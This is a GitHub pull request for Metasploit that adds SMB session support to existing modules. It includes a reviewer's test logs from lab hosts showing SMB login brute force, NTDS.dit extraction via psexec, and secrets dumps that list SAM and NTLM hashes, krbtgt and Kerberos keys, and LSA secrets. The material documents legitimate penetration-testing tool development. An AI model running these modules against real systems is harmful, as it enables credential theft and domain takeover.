Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Smb session type modules #18596

Merged
merged 8 commits into from
Jan 15, 2024
Merged

Smb session type modules #18596

merged 8 commits into from
Jan 15, 2024

Conversation

dwelch-r7
Copy link
Contributor

Continuation of #18539 which must be merged first

This PR adds support (either creating or utilising ) the new SMB session type to a bunch of the existing SMB modules

Verification Steps:

  • make sure the feature is off first features set smb_session_type false
  • Run through the standard usage of the modules, ensure the SESSION datastore option is not visible and the modules succeed
  • Turn the feature on features set smb_session_type true
  • Run through the modules again creating or using an SMB session type where applicable, the results should be identical to the modules standard usage

@dwelch-r7 dwelch-r7 force-pushed the smb-session-type-modules branch from e94e57c to 20a0af6 Compare December 4, 2023 18:06
@dwelch-r7 dwelch-r7 force-pushed the smb-session-type-modules branch 2 times, most recently from 3f4e805 to 336f26d Compare December 6, 2023 14:59
@dwelch-r7 dwelch-r7 force-pushed the smb-session-type-modules branch from 336f26d to 58f79c7 Compare December 12, 2023 11:59
adfoster-r7
adfoster-r7 reviewed Dec 12, 2023
View reviewed changes
modules/auxiliary/admin/smb/delete_file.rb
vprint_status("Connecting to the server...")
connect()
smb_login()
if session
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

What are your thoughts on extracting out the copy/pasta into a shared method? 🤔

Library code:

def use_optional_smb_session_or_yield(&block)
    if session
      print_status("Using existing session #{session.sid}")
      client = session.client
      self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
    else
      yield
    end
end

Calling code in module:

use_optional_smb_session_or_yield do
  vprint_status("Connecting to the server...")
  connect()
  smb_login()
end

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Let's hold off on this for now, we can see how the postgres library requirements go first before we start over-optimizing an API here 👍

@cgranleese-r7 cgranleese-r7 self-assigned this Dec 12, 2023
@cgranleese-r7
Copy link
Contributor

cgranleese-r7 commented Dec 21, 2023
edited
Loading

Notes

Issue with sessions when feature flag is turned off - if a session option was set then save'd the next time the module is ran it will fail with an option validation error.

scanner/smb/smb_login

features set smb_session_type false

msf6 auxiliary(scanner/smb/smb_login) > features

Features table
==============

   #  Name                         Enabled  Description
   -  ----                         -------  -----------
   0  wrapped_tables               true     When enabled Metasploit will wordwrap all tables to fit into the available terminal width
   1  fully_interactive_shells     false    When enabled you will have the option to drop into a fully interactive shell from within meterpreter
   2  manager_commands             true     When enabled you will have access to manager commands such as _servicemanager and _historymanager
   3  datastore_fallbacks          true     When enabled you can consistently set username across modules, instead of setting SMBUser/FTPUser/BIND_DN/etc
   4  metasploit_payload_warnings  false    When enabled Metasploit will output warnings about missing Metasploit payloads, for instance if they were removed by antivirus etc
   5  defer_module_loads           false    When enabled will not eagerly load all modules
   6  smb_session_type             false    When enabled will allow for the creation/use of smb sessions
   7  dns_feature                  false    When enabled, allows configuration of DNS resolution behaviour in Metasploit
   8  hierarchical_search_table    false    When enabled, the search table is enhanced to show details on module actions and targets

msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.175.214:445   - 192.168.175.214:445 - Starting SMB login bruteforce
[+] 192.168.175.214:445   - 192.168.175.214:445 - Success: '.\Administrator:Password1' Administrator
[*] 192.168.175.214:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

features set smb_session_type true

msf6 auxiliary(scanner/smb/smb_login) > features

Features table
==============

   #  Name                         Enabled  Description
   -  ----                         -------  -----------
   0  wrapped_tables               true     When enabled Metasploit will wordwrap all tables to fit into the available terminal width
   1  fully_interactive_shells     false    When enabled you will have the option to drop into a fully interactive shell from within meterpreter
   2  manager_commands             true     When enabled you will have access to manager commands such as _servicemanager and _historymanager
   3  datastore_fallbacks          true     When enabled you can consistently set username across modules, instead of setting SMBUser/FTPUser/BIND_DN/etc
   4  metasploit_payload_warnings  false    When enabled Metasploit will output warnings about missing Metasploit payloads, for instance if they were removed by antivirus etc
   5  defer_module_loads           false    When enabled will not eagerly load all modules
   6  smb_session_type             true     When enabled will allow for the creation/use of smb sessions
   7  dns_feature                  false    When enabled, allows configuration of DNS resolution behaviour in Metasploit
   8  hierarchical_search_table    false    When enabled, the search table is enhanced to show details on module actions and targets

msf6 auxiliary(scanner/smb/smb_login) > run

[*] 192.168.175.214:445   - 192.168.175.214:445 - Starting SMB login bruteforce
[+] 192.168.175.214:445   - 192.168.175.214:445 - Success: '.\Administrator:Password1' Administrator
[*] SMB session 3 opened (192.168.175.1:52010 -> 192.168.175.214:445) at 2023-12-12 15:26:30 +0000
[*] 192.168.175.214:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

admin/smb/delete_file

msf6 auxiliary(admin/smb/delete_file) > run rhost=192.168.175.193 username=foo password=password

[-] 192.168.175.193:445 - Msf::OptionValidateError The following options failed to validate: SESSION
[*] Auxiliary module execution completed
msf6 auxiliary(admin/smb/delete_file) > features

Features table
==============

   #  Name                         Enabled  Description
   -  ----                         -------  -----------
   0  wrapped_tables               true     When enabled Metasploit will wordwrap all tables to fit into the available terminal width
   1  fully_interactive_shells     false    When enabled you will have the option to drop into a fully interactive shell from within meterpreter
   2  manager_commands             true     When enabled you will have access to manager commands such as _servicemanager and _historymanager
   3  datastore_fallbacks          true     When enabled you can consistently set username across modules, instead of setting SMBUser/FTPUser/BIND_DN/etc
   4  metasploit_payload_warnings  false    When enabled Metasploit will output warnings about missing Metasploit payloads, for instance if they were removed by antivirus etc
   5  defer_module_loads           false    When enabled will not eagerly load all modules
   6  smb_session_type             false    When enabled will allow for the creation/use of smb sessions
   7  dns_feature                  false    When enabled, allows configuration of DNS resolution behaviour in Metasploit
   8  hierarchical_search_table    true     When enabled, the search table is enhanced to show details on module actions and targets

features set smb_session_type false

msf6 auxiliary(admin/smb/delete_file) > run rhost=192.168.175.193 username=foo password=password rpath=test.txt smbshare=my_share

[+] 192.168.175.193:445 - Deleted: test.txt
[*] 192.168.175.193:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

features set smb_session_type true

msf6 auxiliary(admin/smb/delete_file) > run

[*] Using existing session 3
[+] Deleted: test.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

admin/smb/download_file

features set smb_session_type false

msf6 auxiliary(admin/smb/download_file) > run rhost=192.168.175.193 username=foo password=password rpath=test.txt smbshare=my_share

[+] 192.168.175.193:445 - test.txt saved as: /Users/cgranleese/.msf4/loot/20231214104901_default_192.168.175.193_smb.shares.file_804023.txt
[*] 192.168.175.193:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

features set smb_session_type true

msf6 auxiliary(admin/smb/download_file) > run

[*] Using existing session 3
[+] test.txt saved as: /Users/cgranleese/.msf4/loot/20231213152815_default_unknown_smb.shares.file_155064.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

admin/smb/psexec_ntdsgrab

features set smb_session_type false

msf6 auxiliary(admin/smb/psexec_ntdsgrab) > run smbuser=Administrator smbpass=Password1 rhosts=192.168.175.214 SMB::AlwaysEncrypt=false SMB::ProtocolVersion=2
[*] Running module against 192.168.175.214

[*] 192.168.175.214:445 - Checking if a Volume Shadow Copy exists already.
[+] 192.168.175.214:445 - Service start timed out, OK if running a command or non-service executable...
[+] 192.168.175.214:445 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[+] 192.168.175.214:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.175.214:445 - Checking if NTDS.dit was copied.
[+] 192.168.175.214:445 - Service start timed out, OK if running a command or non-service executable...
[+] 192.168.175.214:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.175.214:445 - Downloading ntds.dit file
[+] 192.168.175.214:445 - ntds.dit stored at /Users/cgranleese/.msf4/loot/20231214114808_default_192.168.175.214_psexec.ntdsgrab._269567.dit
[*] 192.168.175.214:445 - Downloading SYSTEM hive file
[+] 192.168.175.214:445 - SYSTEM hive stored at /Users/cgranleese/.msf4/loot/20231214114815_default_192.168.175.214_psexec.ntdsgrab._208085.bin
[*] 192.168.175.214:445 - Executing cleanup...
[+] 192.168.175.214:445 - Cleanup was successful
[*] Auxiliary module execution completed

features set smb_session_type true

msf6 auxiliary(admin/smb/psexec_ntdsgrab) > run session=1  rhosts=192.168.175.214 SMB::AlwaysEncrypt=false SMB::ProtocolVersion=2
[*] Running module against 192.168.175.214

[*] Using existing session 1
[*] Checking if a Volume Shadow Copy exists already.
[+] Service start timed out, OK if running a command or non-service executable...
[+] Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[+] Service start timed out, OK if running a command or non-service executable...
[*] Checking if NTDS.dit was copied.
[+] Service start timed out, OK if running a command or non-service executable...
[+] Service start timed out, OK if running a command or non-service executable...
[*] Downloading ntds.dit file
[+] ntds.dit stored at /Users/cgranleese/.msf4/loot/20231214115307_default_192.168.175.214_psexec.ntdsgrab._629723.dit
[*] Downloading SYSTEM hive file
[+] SYSTEM hive stored at /Users/cgranleese/.msf4/loot/20231214115416_default_192.168.175.214_psexec.ntdsgrab._909061.bin
[*] Executing cleanup...
[+] Cleanup was successful
[*] Auxiliary module execution completed

admin/smb/upload_file

features set smb_session_type false

msf6 auxiliary(admin/smb/upload_file) > run rhost=192.168.175.193 username=foo password=password rpath=test.txt smbshare=my_share lpath=test.txt

[+] 192.168.175.193:445 - test.txt uploaded to test.txt
[*] 192.168.175.193:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

features set smb_session_type true

msf6 auxiliary(admin/smb/upload_file) > run

[*] Using existing session 3
[+] test.txt uploaded to test.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

gather/windows_secrets_dump

features set smb_session_type false

msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 192.168.175.214

[*] 192.168.175.214:445 - Service RemoteRegistry is in stopped state
[*] 192.168.175.214:445 - Starting service...
[*] 192.168.175.214:445 - Retrieving target system bootKey
[+] 192.168.175.214:445 - bootKey: 0x2abc807fa60226f4a1b2c5efb01cef6c
[*] 192.168.175.214:445 - Saving remote SAM database
[*] 192.168.175.214:445 - Dumping SAM hashes
[*] 192.168.175.214:445 - Password hints:
No users with password hints on this system
[*] 192.168.175.214:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] 192.168.175.214:445 - Saving remote SECURITY database
[*] 192.168.175.214:445 - Decrypting LSA Key
[*] 192.168.175.214:445 - Dumping LSA Secrets
$MACHINE.ACC
VB\DC1$:plain_password_hex:92672c5182c99ffdf47c6d4a630801cae44845e4eccb7f811d957c47f72a9929423c63cd519c41217240aa9757a3c4346e2f61b03643fae6e7e78fe8844a1127d88151666c8cc65e6ad5d129fc26497a03950c8bd1b363acf4207bdaa6023cee6001294de16a5c1330fa48e22e314c2a19e5aeb22d41a1a7fe3fac8a58552945660a05711d30a0a76b6dce07d87c2f7e5dea8abc0c7fa26f5527ea8cbf9a6fb52f9b7016f47d650d5d6003d58085a5d2fc4786227ca3baaafba3aff2ac8af75eac08253ef732cef2c399440670fefcd5456451e7b9be6821dbdadf2ab9e0055bdea1f066240e70336edf59d3f4a9dd6b
VB\DC1$:aes256-cts-hmac-sha1-96:1caf3a6e31e62711f8ab9422ceead1082295722a05b91f15497a0a7df600a162
VB\DC1$:aes128-cts-hmac-sha1-96:81870addbfbbea0df3b2d6ea70f13c14
VB\DC1$:des-cbc-md5:62306332306530326530376131333833
VB\DC1$:rc4-hmac:2e6c7902ec0360d3ed307528138dbba5
VB\DC1$:aad3b435b51404eeaad3b435b51404ee:2e6c7902ec0360d3ed307528138dbba5:::

DPAPI_SYSTEM
dpapi_machinekey: 0x56190ef5124f7f1b6102323f88a665d7438964bd
dpapi_userkey: 0x9ef0f9bea8765eb61274ce28b80dec32cc84c54d

NL$KM
7b 94 01 e5 c8 90 8b 3c 92 be 98 ca 6e 4f 04 54    |{......<....nO.T|
86 27 1c ef dc bf 4c 28 71 7c 6c a8 20 0e e2 fc    |.'....L(q|l. ...|
98 7e 2e 0e 96 58 4e b2 bd 16 8a 7d 25 24 95 86    |.~...XN....}%$..|
f4 19 0e 44 82 94 67 a6 5a 6a a8 b8 e3 49 5d e1    |...D..g.Zj...I].|
Hex string: 7b9401e5c8908b3c92be98ca6e4f045486271cefdcbf4c28717c6ca8200ee2fc987e2e0e96584eb2bd168a7d25249586f4190e44829467a65a6aa8b8e3495de1

[*] 192.168.175.214:445 - Decrypting NL$KM
[*] 192.168.175.214:445 - Dumping cached hashes
No cached hashes on this system
[*] 192.168.175.214:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 192.168.175.214:445 - Using the DRSUAPI method to get NTDS.DIT secrets
[*] 192.168.175.214:445 - SID enumeration progress -  0 / 11 ( 0.00%)
[*] 192.168.175.214:445 - SID enumeration progress - 11 / 11 (  100%)
# SID's:
Administrator: S-1-5-21-1975591874-2236985952-3915871362-500
Guest: S-1-5-21-1975591874-2236985952-3915871362-501
krbtgt: S-1-5-21-1975591874-2236985952-3915871362-502
foo: S-1-5-21-1975591874-2236985952-3915871362-1000
vb.local\j.bloggs: S-1-5-21-1975591874-2236985952-3915871362-1105
vb.local\wîth.dìáçriticš: S-1-5-21-1975591874-2236985952-3915871362-1107
sshd: S-1-5-21-1975591874-2236985952-3915871362-1608
DC1$: S-1-5-21-1975591874-2236985952-3915871362-1001
FOO$: S-1-5-21-1975591874-2236985952-3915871362-1602
BAR$: S-1-5-21-1975591874-2236985952-3915871362-1603
TEST$: S-1-5-21-1975591874-2236985952-3915871362-1604

# NTLM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b2edfe09a8b7036eab234e6430179b19:::
foo:1000:aad3b435b51404eeaad3b435b51404ee:15eac911fa04058ebdf0e83d2a53433c:::
vb.local\j.bloggs:1105:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
vb.local\wîth.dìáçriticš:1107:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
sshd:1608:aad3b435b51404eeaad3b435b51404ee:d009dba2bbfb18ea19191babb7c72ada:::
DC1$:1001:aad3b435b51404eeaad3b435b51404ee:2e6c7902ec0360d3ed307528138dbba5:::
FOO$:1602:aad3b435b51404eeaad3b435b51404ee:f45c54d985febb4c220b9ae1be3c168e:::
BAR$:1603:aad3b435b51404eeaad3b435b51404ee:1fb0f7c798f9cdfaa662b7e334255d5f:::
TEST$:1604:aad3b435b51404eeaad3b435b51404ee:e8ff97e24ef9bc8d4e83c3d4e518e0c9:::

# Full pwdump format:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202305031006,LastLogonTimestamp=202312111011,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:Disabled=true,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=true,PasswordLastChanged=never,LastLogonTimestamp=never,IsAdministrator=false,IsDomainAdmin=false,IsEnterpriseAdmin=false::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b2edfe09a8b7036eab234e6430179b19:Disabled=true,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=202209151419,LastLogonTimestamp=never,IsAdministrator=false,IsDomainAdmin=false,IsEnterpriseAdmin=false::
foo:1000:aad3b435b51404eeaad3b435b51404ee:15eac911fa04058ebdf0e83d2a53433c:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=true,PasswordLastChanged=202311031531,LastLogonTimestamp=202311211307,IsAdministrator=true,IsDomainAdmin=false,IsEnterpriseAdmin=false::
vb.local\j.bloggs:1105:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=never,LastLogonTimestamp=never,IsAdministrator=false,IsDomainAdmin=false,IsEnterpriseAdmin=false::
vb.local\wîth.dìáçriticš:1107:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=never,LastLogonTimestamp=never,IsAdministrator=false,IsDomainAdmin=false,IsEnterpriseAdmin=false::
sshd:1608:aad3b435b51404eeaad3b435b51404ee:d009dba2bbfb18ea19191babb7c72ada:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202311241210,LastLogonTimestamp=never,IsAdministrator=false,IsDomainAdmin=false,IsEnterpriseAdmin=false::
DC1$:1001:aad3b435b51404eeaad3b435b51404ee:2e6c7902ec0360d3ed307528138dbba5:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=202312060959,LastLogonTimestamp=202312081556,IsAdministrator=false,IsDomainAdmin=false,IsEnterpriseAdmin=false::
FOO$:1602:aad3b435b51404eeaad3b435b51404ee:f45c54d985febb4c220b9ae1be3c168e:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=true,PasswordLastChanged=202309191011,LastLogonTimestamp=never,IsAdministrator=false,IsDomainAdmin=false,IsEnterpriseAdmin=false::
BAR$:1603:aad3b435b51404eeaad3b435b51404ee:1fb0f7c798f9cdfaa662b7e334255d5f:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=true,PasswordLastChanged=202309191011,LastLogonTimestamp=never,IsAdministrator=false,IsDomainAdmin=false,IsEnterpriseAdmin=false::
TEST$:1604:aad3b435b51404eeaad3b435b51404ee:e8ff97e24ef9bc8d4e83c3d4e518e0c9:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=true,PasswordLastChanged=202309191013,LastLogonTimestamp=never,IsAdministrator=false,IsDomainAdmin=false,IsEnterpriseAdmin=false::

# Account Info:
## CN=Administrator,CN=Users,DC=vb,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: true
- Password last changed: 2023-05-03 10:06:49 UTC
- Last logon: 2023-12-11 10:11:12 UTC
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: true
- Password not required: false
## CN=Guest,CN=Users,DC=vb,DC=local
- Administrator: false
- Domain Admin: false
- Enterprise Admin: false
- Password last changed: never
- Last logon: never
- Account disabled: true
- Computer account: false
- Expired: false
- Password never expires: true
- Password not required: true
## CN=krbtgt,CN=Users,DC=vb,DC=local
- Administrator: false
- Domain Admin: false
- Enterprise Admin: false
- Password last changed: 2022-09-15 14:19:59 UTC
- Last logon: never
- Account disabled: true
- Computer account: false
- Expired: false
- Password never expires: false
- Password not required: false
## CN=foo,CN=Users,DC=vb,DC=local
- Administrator: true
- Domain Admin: false
- Enterprise Admin: false
- Password last changed: 2023-11-03 15:31:01 UTC
- Last logon: 2023-11-21 13:07:20 UTC
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: false
- Password not required: true
## CN=Joe Bloggs,OU=Users,OU=UK,DC=vb,DC=local
- Administrator: false
- Domain Admin: false
- Enterprise Admin: false
- Password last changed: never
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: false
- Password not required: false
## CN=wîth.dìáçriticš,OU=Users,OU=UK,DC=vb,DC=local
- Administrator: false
- Domain Admin: false
- Enterprise Admin: false
- Password last changed: never
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: false
- Password not required: false
## CN=sshd,CN=Users,DC=vb,DC=local
- Administrator: false
- Domain Admin: false
- Enterprise Admin: false
- Password last changed: 2023-11-24 12:10:47 UTC
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: true
- Password not required: false
## CN=DC1,OU=Domain Controllers,DC=vb,DC=local
- Administrator: false
- Domain Admin: false
- Enterprise Admin: false
- Password last changed: 2023-12-06 09:59:25 UTC
- Last logon: 2023-12-08 15:56:09 UTC
- Account disabled: false
- Computer account: true
- Expired: false
- Password never expires: false
- Password not required: false
## CN=Foo,OU=Computers,OU=UK,DC=vb,DC=local
- Administrator: false
- Domain Admin: false
- Enterprise Admin: false
- Password last changed: 2023-09-19 10:11:11 UTC
- Last logon: never
- Account disabled: false
- Computer account: true
- Expired: false
- Password never expires: false
- Password not required: true
## CN=Bar,OU=Computers,OU=UK,DC=vb,DC=local
- Administrator: false
- Domain Admin: false
- Enterprise Admin: false
- Password last changed: 2023-09-19 10:11:49 UTC
- Last logon: never
- Account disabled: false
- Computer account: true
- Expired: false
- Password never expires: false
- Password not required: true
## CN=Test,CN=Computers,DC=vb,DC=local
- Administrator: false
- Domain Admin: false
- Enterprise Admin: false
- Password last changed: 2023-09-19 10:13:53 UTC
- Last logon: never
- Account disabled: false
- Computer account: true
- Expired: false
- Password never expires: false
- Password not required: true

# Password history (pwdump format - uid:rid:lmhash:nthash:::):
Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
foo_history0:1000:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
DC1$_history0:1001:aad3b435b51404eeaad3b435b51404ee:44ff40b0331819c5c6ce47251cc14269:::
DC1$_history1:1001:aad3b435b51404eeaad3b435b51404ee:a4150955d10e3ee08c56014e9fb50ca9:::
DC1$_history2:1001:aad3b435b51404eeaad3b435b51404ee:14ecb906e9a3be75d7df272adba3ec82:::
DC1$_history3:1001:aad3b435b51404eeaad3b435b51404ee:bb1d27136ed4a62fd440280d142ce04c:::
DC1$_history4:1001:aad3b435b51404eeaad3b435b51404ee:b4e227f617e3e2848379a8171829651a:::
DC1$_history5:1001:aad3b435b51404eeaad3b435b51404ee:f0f0f857229cc383eed382a7b3ac6b80:::
DC1$_history6:1001:aad3b435b51404eeaad3b435b51404ee:4f8bcabb6488eab516243e533c568307:::
DC1$_history7:1001:aad3b435b51404eeaad3b435b51404ee:ee6ca2e1a0ab29d76c616603df00ef2e:::
DC1$_history8:1001:aad3b435b51404eeaad3b435b51404ee:14a2056c794a557556d3b61387ae5501:::
DC1$_history9:1001:aad3b435b51404eeaad3b435b51404ee:9d7f36a0dcb21865ff35141b9d2629ba:::

# Kerberos keys:
Administrator:aes256-cts-hmac-sha1-96:de82f642a52c3ec81bfed9ac47a44d4720d90fa154b7de57a69611f1275f9720
Administrator:aes128-cts-hmac-sha1-96:96ee4c507d20780dcb49d066992f309b
Administrator:des-cbc-md5:b652800dcef46716
krbtgt:aes256-cts-hmac-sha1-96:7a6a48d4264d62e785378341e693c2d4ce6f1d7e949b91b7b0f37f31a3083bae
krbtgt:aes128-cts-hmac-sha1-96:2630f0502eccc4ae6e78423607670691
krbtgt:des-cbc-md5:c4867f13863e7a2f
foo:aes256-cts-hmac-sha1-96:14116717ce3045f75a941c70cf3cbb49de1e8b17eeedf80d00114b57aa4c3794
foo:aes128-cts-hmac-sha1-96:b3aad298d9aa31f024e2ad9461f0025b
foo:des-cbc-md5:7602ef545ed6b3cb
vb.local\j.bloggs:aes256-cts-hmac-sha1-96:c38e4f771b4aeea75165d0e6b0fd7ea1274be1db0f31703902218afcbae86892
vb.local\j.bloggs:aes128-cts-hmac-sha1-96:1c50117c85d551c2ae6621086f73611d
vb.local\j.bloggs:des-cbc-md5:45fe1af70e02fef7
vb.local\wîth.dìáçriticš:aes256-cts-hmac-sha1-96:37227bc2d88154536d054d0bc4c2ea69492894e16071f5f2cb41f023ab165778
vb.local\wîth.dìáçriticš:aes128-cts-hmac-sha1-96:53676f830a34b0048dabab2816010666
vb.local\wîth.dìáçriticš:des-cbc-md5:64eaa1833d946883
sshd:aes256-cts-hmac-sha1-96:09a4e1fc8ae5c4ccff465a366ad6a22efcbd09751a6b19bd98fc6ebc0dd23388
sshd:aes128-cts-hmac-sha1-96:21f5a78c2c06776dc7af858b2ca1ad81
sshd:des-cbc-md5:3b58ea6b9e8025ad
DC1$:aes256-cts-hmac-sha1-96:1caf3a6e31e62711f8ab9422ceead1082295722a05b91f15497a0a7df600a162
DC1$:aes128-cts-hmac-sha1-96:81870addbfbbea0df3b2d6ea70f13c14
DC1$:des-cbc-md5:626783e50b01402c
FOO$:aes256-cts-hmac-sha1-96:6b646f38421ab8274e7ecc7b7e3dc4f81754326c28a2ad1d6221a3099ac8a940
FOO$:aes128-cts-hmac-sha1-96:7245ce81d7386056118618abb0847764
FOO$:des-cbc-md5:94a8389276d35b68
BAR$:aes256-cts-hmac-sha1-96:444bdb617eca9affafd98f18223a51da8a151a26ac470be02c0b70fa0549ea89
BAR$:aes128-cts-hmac-sha1-96:6785b64604b8b58278ca45b861f65ef9
BAR$:des-cbc-md5:76b6517f8a70a1b0
TEST$:aes256-cts-hmac-sha1-96:25cffc19c7642629e41cf8f6ff8621e45201989f25b75eae1d62ecfaf8a8a8a9
TEST$:aes128-cts-hmac-sha1-96:433f01ebf442930362950199bac4674b
TEST$:des-cbc-md5:9243d3b3da3470d0

# Clear text passwords:
[*] 192.168.175.214:445 - Cleaning up...
[*] 192.168.175.214:445 - Stopping service RemoteRegistry...
[*] Auxiliary module execution completed

features set smb_session_type true

msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 192.168.175.214

[*] 192.168.175.214:445 - Service RemoteRegistry is already running
[*] 192.168.175.214:445 - Retrieving target system bootKey
[+] 192.168.175.214:445 - bootKey: 0x2abc807fa60226f4a1b2c5efb01cef6c
[*] 192.168.175.214:445 - Saving remote SAM database
[*] 192.168.175.214:445 - Dumping SAM hashes
[*] 192.168.175.214:445 - Password hints:
No users with password hints on this system
[*] 192.168.175.214:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] 192.168.175.214:445 - Saving remote SECURITY database
[*] 192.168.175.214:445 - Decrypting LSA Key
[*] 192.168.175.214:445 - Dumping LSA Secrets
$MACHINE.ACC
VB\DC1$:plain_password_hex:92672c5182c99ffdf47c6d4a630801cae44845e4eccb7f811d957c47f72a9929423c63cd519c41217240aa9757a3c4346e2f61b03643fae6e7e78fe8844a1127d88151666c8cc65e6ad5d129fc26497a03950c8bd1b363acf4207bdaa6023cee6001294de16a5c1330fa48e22e314c2a19e5aeb22d41a1a7fe3fac8a58552945660a05711d30a0a76b6dce07d87c2f7e5dea8abc0c7fa26f5527ea8cbf9a6fb52f9b7016f47d650d5d6003d58085a5d2fc4786227ca3baaafba3aff2ac8af75eac08253ef732cef2c399440670fefcd5456451e7b9be6821dbdadf2ab9e0055bdea1f066240e70336edf59d3f4a9dd6b
VB\DC1$:aes256-cts-hmac-sha1-96:1caf3a6e31e62711f8ab9422ceead1082295722a05b91f15497a0a7df600a162
VB\DC1$:aes128-cts-hmac-sha1-96:81870addbfbbea0df3b2d6ea70f13c14
VB\DC1$:des-cbc-md5:62306332306530326530376131333833
VB\DC1$:rc4-hmac:2e6c7902ec0360d3ed307528138dbba5
VB\DC1$:aad3b435b51404eeaad3b435b51404ee:2e6c7902ec0360d3ed307528138dbba5:::

DPAPI_SYSTEM
dpapi_machinekey: 0x56190ef5124f7f1b6102323f88a665d7438964bd
dpapi_userkey: 0x9ef0f9bea8765eb61274ce28b80dec32cc84c54d

NL$KM
7b 94 01 e5 c8 90 8b 3c 92 be 98 ca 6e 4f 04 54    |{......<....nO.T|
86 27 1c ef dc bf 4c 28 71 7c 6c a8 20 0e e2 fc    |.'....L(q|l. ...|
98 7e 2e 0e 96 58 4e b2 bd 16 8a 7d 25 24 95 86    |.~...XN....}%$..|
f4 19 0e 44 82 94 67 a6 5a 6a a8 b8 e3 49 5d e1    |...D..g.Zj...I].|
Hex string: 7b9401e5c8908b3c92be98ca6e4f045486271cefdcbf4c28717c6ca8200ee2fc987e2e0e96584eb2bd168a7d25249586f4190e44829467a65a6aa8b8e3495de1

[*] 192.168.175.214:445 - Decrypting NL$KM
[*] 192.168.175.214:445 - Dumping cached hashes
No cached hashes on this system
[*] 192.168.175.214:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 192.168.175.214:445 - Using the DRSUAPI method to get NTDS.DIT secrets
